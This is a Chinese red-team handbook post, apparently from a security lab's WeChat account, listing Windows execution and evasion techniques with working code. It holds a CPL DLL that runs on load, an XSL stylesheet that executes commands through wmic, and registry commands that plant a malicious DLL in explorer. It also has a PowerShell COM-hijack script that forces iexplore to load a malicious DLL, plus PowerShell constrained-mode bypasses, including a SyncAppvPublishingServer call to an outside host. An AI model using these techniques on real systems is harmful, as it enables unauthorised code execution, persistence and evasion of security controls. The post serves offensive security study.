红队手册

CPL文件本质是Windows可执行性文件，但不属于可以直接独立运行的文件，可以由shell32.dll或者control.exe打开

item.cpl

// dllmain.cpp : Defines the entry point for the DLL application.#include "stdafx.h"#include <Windows.h>

//Cplappletextern "C" __declspec(dllexport) LONG Cplapplet(HWND hwndCpl,UINT msg,LPARAM lParam1,LPARAM lParam2){MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);return 1;}

BOOL APIENTRY DllMain( HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:{Cplapplet(NULL, NULL, NULL, NULL);}case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}

执行方式：

1、双击就可执行

2、通过rundll32 调用shell32来执行

rundll32 shell32, Control_RunDLL \VBOXSVRExperimentscpldoubleclickcpldoubleclickDebugcpldoubleclick.cpl

3、通过control.exe <pathtothe.cpl>

Eval.xsl

<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/><ms:script implements-prefix="user" language="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc");]]> </ms:script></stylesheet>cmd执行wmic os get /FORMAT:"evil.xsl"

通过更改控制面板的注册表，来将恶意的dll注入到explorer.exe文件中

控制面板注册表：

HKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs

注入命令：

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionControl 

PanelCPLs" /v spotless /d 

"C:labscplAddincplAddinx64ReleasecplAddin2.dll" /f

这个做法的前提需要iexplore.exe运行在目标系统

Code borrowed from https://github.com/nettitude/Invoke-

PowerThIEf/blob/master/Invoke-PowerThIEf.ps1 by Rob Maslen

$CLSID = "55555555-5555-5555-5555-555555555555"

Remove-Item -Recurse -Force -Path "HKCU:SoftwareClassesCLSID

{$CLSID}" -ErrorAction SilentlyContinue

path to the malicious DLL we want iexplore to load and execute

$payload = "\VBOXSVRExperimentsevilm64.dll"

New-Item -Path "HKCU:SoftwareClassesCLSID" -ErrorAction SilentlyContinue | Out-Null

New-Item -Path "HKCU:SoftwareClassesCLSID{$CLSID}" | Out-Null

New-Item -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" | Out-Null

New-Item -Path "HKCU:SoftwareClassesCLSID{$CLSID}ShellFolder" | 

Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" -Name "(default)" -Value $Payload | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" -Name "ThreadingModel" -Value "Apartment" | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" -Name "LoadWithoutCOM" -Value "" | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}ShellFolder" -Name "HideOnDesktop" -Value "" | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}ShellFolder" -Name "Attributes" -Value 0xf090013d -PropertyType DWORD | Out-Null

force iexplore to load the malicious DLL and execute it

$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")

$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)

$shwin = [System.Activator]::CreateInstance($typeShwin) | ? {$_.fullname -match 'iexplore'} | Select-Object -First 1

$shWin.Navigate2("shell:::{$CLSID}", 2048)

还没有测试，见：https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques/blob/master/offensive-security/code-execution/forcing-iexplore.exe-to-load-a-malicious-dll-via-com-abuse.md

约束语言模式：

是缓解PowerShell攻击的一种方式，能够阻止执行任意未签名的代码。当Device Guard或者AppLocker处于强制模式时，它是最实际有效的强制安全措施，因为未被策略允许的任何脚本或者模块都位于受限语言模式下，这严重限制了攻击者执行未签名的代码。

1、powershell内嵌powershell

$a=[powershell]::Create();$a.AddCommand('whoami');$a.Invoke()

2、poershell降低版本

通过：powershell -version 2来绕过限制

如果是在powershell运行受限制的环境中

1、用rundll32

rundll32.exe PowerShdll.dll,main

2、使用win10中的新方法SyncAppvPublishingServer，SyncAppvPublishingServer.exeandSyncAppvPublishingServer.vbs都可以执行任意命令

SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"

本文始发于微信公众号（雷石安全实验室）：红队手册